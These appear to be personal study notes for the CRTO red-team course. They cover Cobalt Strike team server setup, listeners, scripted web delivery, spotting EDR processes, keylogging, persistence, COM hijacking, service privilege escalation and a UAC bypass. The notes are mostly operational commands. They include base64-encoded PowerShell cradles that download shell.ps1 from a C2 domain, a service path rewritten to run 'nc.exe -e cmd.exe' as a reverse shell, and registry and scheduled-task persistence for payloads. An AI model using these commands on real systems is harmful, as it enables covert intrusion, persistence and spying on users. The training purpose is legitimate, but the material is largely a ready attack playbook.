Cobalt Strike

This is a temporary notes while I finished the course then I moved to

How to set up the Team Server

#Start the teamserver and run as service
Intrusionz3r0@htb[/crto]$ sudo ./teamserver <Attacker-Box> <Password-TeamServer> c2-profiles/normal/webbug.profile

Launch cobalt strike client from the taskbar and enter the next details as follows:

#Set parameters:
Alias: MyKali
Host: <Attacker-Box>
Port: Defaul Port
Username: Intrusionz3r0
Password: <Password-TeamServer>

Running team server as service to start automatically

Intrusionz3r0@htb[/crto]$ ip a
Intrusionz3r0@htb[/crto]$ sudo nano /etc/systemd/system/teamserver.service

[Unit]
Description=Cobalt Strike Team Server
After=network.target
StartLimitIntervalSec=0

[Service]
Type=simple
Restart=always
RestartSec=1
User=root
WorkingDirectory=/home/attacker/cobaltstrike
ExecStart=/home/attacker/cobaltstrike/teamserver 10.10.5.50 Passw0rd! c2-profiles/normal/webbug.profile

[Install]
WantedBy=multi-user.target

Intrusionz3r0@htb[/crto]$ sudo systemctl daemon-reload
Intrusionz3r0@htb[/crto]$ sudo systemctl start teamserver.service
Intrusionz3r0@htb[/crto]$ sudo systemctl enable teamserver.service
Intrusionz3r0@htb[/crto]$ sudo systemctl status teamserver.service

Setting up DNS records for DNS based beacon payloads

Cobalt Funcionalities

Listeners

There are two main types of listeners:

1. Egress Listeners: These let Beacons talk to the hacker's server from outside the target network, like using the internet. The most common types are:

   • HTTP/S: Beacons communicate using web traffic (like visiting a website).

   • DNS: Beacons hide their messages in DNS requests (like asking for a website's address).

2. Peer-to-Peer Listeners: These are for communication inside the same network, where Beacons talk directly to each other instead of calling the main server.

How to Set Up an Listener:

• Go to Cobalt Strike > Listeners or click the headphone icon. 🎧
• Click Add (Below bar), choose Beacon HTTP/DNS/TCP/SMB, and name it (something easy to remember).

• Add the server's IP or domain name Ex: nickelviper.com

Setting up the SMB Listener

• Default pipe name is quite well signatured. A good strategy is to emulate names known to be used by common applications or Windows itself.

PS C:\> ls \\.\pipe\

• Select one for example: TSVCPIPE-4036c92b-65ae-4601-1337-57f7b24a0c57

• Change the final 4 characters: TSVCPIPE-4036c92b-65ae-4601-1337-57f7b24aAAAA

When Create the listener you have to specify it inside Pipename (C2) field.

Pivot Listeners

Pivot Listeners are an advanced Cobalt Strike feature that lets you use an already compromised Beacon as a "bridge" to reach other internal systems in a network.

Pivots can only be created by beacons

1. Click on beacon

2. Click on pivoting

   1. Listener

      1. Set name

      2. Set Payload

      3. Host set by default

      4. Set Port:D 1234

      5. Session set by default

PS C:\> netstat -anop tcp | findstr 1234

Set up a Script web delivery

1. Attacks > Scripted Web Delivery (S)

   1. Set URI Path

   2. Set Host (nickelviper.com)

   3. Set Port

   4. Set Listener

   5. Set type

   6. Enable Use X64 Payload

      1. Copy the payload

Hosting a file

1. Site Management > Host file

   1. Select the file

   2. Set the Local URI

   3. Set Host

   4. Set Port

   5. Set mime type (Default: Automatic)

Interact with local binaries

beacon> execute-assembly c:\path\binary.exe
beacon> execute-assembly C:\Tools\Seatbelt\Seatbelt\bin\Release\Seatbelt.exe -group=system

Cobalt Strike useful commands

The longer the sleep, the healthier the beacon due to less communication and stealth.

#Show help menu
beacon> help 
beacon> help sleep 
#Modify sleep communication time
beacon> sleep 5 
beacon> sleep 0 #Interactive mode (real time)

#Connect to Beacond bind TCP connection
beacon> connect [localhost|ip|hostname] PORT

Notes for CRTO

Initial Recoinassense

Identify security solutions in placed through the system.

EDR / (AV)

• CrowdStrike Falcon: csagent.exe, CSFalconService.exe

• Microsoft Defender: MsMpEng.exe, MSASCui.exe

• Elastic Security: elastic-agent.exe, elastic-endpoint.exe

• Carbon Black: cb.exe, CbDefense.exe

• SentinelOne: SentinelAgent.exe

• CylancePROTECT: CylanceSvc.exe

• Symantec: ccSvcHst.exe, Rtvscan.exe

• Trend Micro: TmCCSF.exe

• Kaspersky: avp.exe

SIEM

• Splunk: splunkd.exe

• IBM QRadar: qradar.exe

• Tanium: TaniumClient.exe

Another tools

• Sysmon: sysmon.exe

• Osquery: osqueryd.exe

• Wazuh: wazuh-agent.exe

# List the proccess running on the system
beacon> ps

#Enumerate users that are currently logged on the machine.
beacon> net logons

# Collect information about security configuration
beacon> execute-assembly C:\Tools\Seatbelt\Seatbelt\bin\Release\Seatbelt.exe -group=system

#Take screenshots (View > screenshots)
beacon> printscreen
beacon> printshot
beacon> screenwatch

#Enable keylogger.
beacon> keylogger
beacon> jobs
beacon> jobkill 6

#Copy data from clipboard
beacon> clipboard

Host Persistence

Tool: SharPersist

Aggressor Scripts: persistence-sharpersist

Powershell Executable file location: PowerShell_Executables_File_System_Locations.php

#Powershell paths
C:\windows\syswow64\windowspowershell\v1.0\powershell
C:\Windows\System32\WindowsPowerShell\v1.0\powershell
# Encode Payload on Windows
PS C:\> $str = 'IEX ((new-object net.webclient).downloadstring("http://nickelviper.com/shell.ps1"))'
PS C:\> [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($str))

# Encode Payload on Linux 
Intrusionz3r0@htb[/crto]$ echo -n "IEX(New-Object Net.WebClient).downloadString('http://nickelviper.com/shell.ps1')" | iconv -t UTF-16LE | base64 -w 0;echo

#Execute command
PS C:\> powershell -nop -enc <BASE64_ENCODED_PAYLOAD>

#Task Scheduler
beacon> execute-assembly C:\Tools\SharPersist\SharPersist\bin\Release\SharPersist.exe -t schtask -c "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -a "ARGUMENT" -n "NAME" -m add/remove/check/list -o hourly
beacon> execute-assembly C:\Tools\SharPersist\SharPersist\bin\Release\SharPersist.exe -t schtask -c "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -a "ARGUMENT" -n "NAME" -m add/remove/check/list -o logon

#Startup Folder
beacon> execute-assembly C:\Tools\SharPersist\SharPersist\bin\Release\SharPersist.exe -t startupfolder -c "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -a "-nop -w hidden -enc SQBFAFgAKABOAG<SNIF>" -f "Filenameoutput" -m add 

# Persistance - Registry Autorun
beacon> cd C:\Windows\System32\spool\drivers\color
beacon> upload C:\Payloads\http_x64.exe
beacon> mv http_x64.exe Timer.exe
beacon> execute-assembly C:\Tools\SharPersist\SharPersist\bin\Release\SharPersist.exe -t reg -c "C:\ProgramData\Timer.exe" -a "/q /n" -k "hkcurun" -v "Timer" -m add

Hijacking COM objects

Process Monitor: procmon

Use process monitor and set filters as follows:

Look for any particular process is loading a .dll or .exe and take note about CLSID.

#Check whether exists or not.
PS C:\> Get-Item -Path "HKLM:\Software\Classess\CLSID\{ID}\InprocServer32"
PS C:\> Get-Item -Path "HKCU:\Software\Classess\CLSID\{ID}\InprocServer32"


#Hijacking COM object
PS C:\> New-Item -Path "HKCU:Software\Classes\CLSID" -Name "{AB8902B4-09CA-4bb6-B78D-A8F59079ABD5}"
PS C:\> New-Item -Path "HKCU:Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079ABD5}" -Name "InprocServer32" -Value "C:\PATH\http_x64.dll"
PS C:\> New-ItemProperty -Path "HKCU:Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079ABD5}\InprocServer32" -Name "ThreadingModel" -Value "Both"

#Get the object
PS C:\> Get-ChildItem -Path "Registry::HKCR\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079ABD5}"

Script to detect CLSID with Powershell

$Tasks = Get-ScheduledTask

foreach ($Task in $Tasks)
{
    if ($Task.Actions.ClassId -ne $null)
    {
        if ($Task.Triggers.Enabled -eq $true)
        {
            if ($Task.Principal.GroupId -eq "Users")
            {
                Write-Host "Task Name: " $Task.TaskName
                Write-Host "Task Path: " $Task.TaskPath
                Write-Host "CLSID: " $Task.Actions.ClassId
                Write-Host
            }
        }
    }
}

Host Privilege Escalation

It is recommended to use TCP beacons bound to localhost only for privilege escalation

Privilege escalation via Unquoted Service Path

Requirements:

1. Service with Unquoted Service Path

2. Having Write Permission (Ex: BUILTTIN/USERS)

# Enumerate Services installed on server
beacon> run wmic service get name, pathname
beacon> run sc query
beacon> run sc qc VulnService1
beacon> run sc stop VulnService1
beacon> run sc start VulnService1
beacon> powershell Get-Service | fl
beacon> powershell Stop-Service -Name 'IObitUnSvr'
beacon> powershell Start-Service -Name 'IObitUnSvr'
beacon> powershell Restart-Service -Name 'IObitUnSvr'

#Modify the binaries execution
beacon> powershell Set-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\ModelManagerService -Name "ImagePath" -Value "C:\Windows\System32\spool\drivers\color\nc.exe -e cmd.exe 10.10.10.205 443"
beacon> run sc config <ServiceName> binpath="COMMAND-HERE"

#Shutdown machine
beacon> run shutdown -r -t 0

#Enumerate the system
beacon> execute-assembly C:\Tools\SharpUp\SharpUp\bin\Release\SharpUp.exe audit
#Enumerate ModifiableServices
beacon> execute-assembly C:\Tools\SharpUp\SharpUp\bin\Release\SharpUp.exe ModifiableServices

#Enumerate ACLs
beacon> run icacls "C:\PATH"
beacon> powershell Get-Acl -Path "C:\PATH" | fl

#Exploitation with writing permission on folder
beacon> cd C:\Program Files\Vulnerable Services
beacon> upload C:\Payloads\tcp-local_x64.svc.exe
beacon> mv tcp-local_x64.svc.exe Service.exe
beacon> run sc stop VulnService1
beacon> run sc start VulnService1
beacon> connect localhost 4444

#Exploitation with permission to modify the binPath
beacon> run sc qc VulnService2
beacon> run sc config VulnService2 binPath= C:\Windows\System32\spool\drivers\color\evil.exe
beacon> run sc stop VulnService2
beacon> run sc start VulnService2
beacon> connect localhost 4444

#Exploitation via weak binary permission
#    Check ACLs for Modify permissions
#    Overwrite the binary to abuse of it
beacon> upload Service 3.exe
beacon> run sc start VulnService3
beacon> connect localhost 4444

Script to obtain ACLs: Get-ServiceAcl

beacon> powershell-import Get-ServiceAcl.ps1
beacon> powershell Get-ServiceAcl -Name VulnService2 | select -expand Access

UAC Bypass

beacon> elevate uac-schtasks tcp-local
beacon> run netstat -anop tcp
beacon> connect localhost <PORT>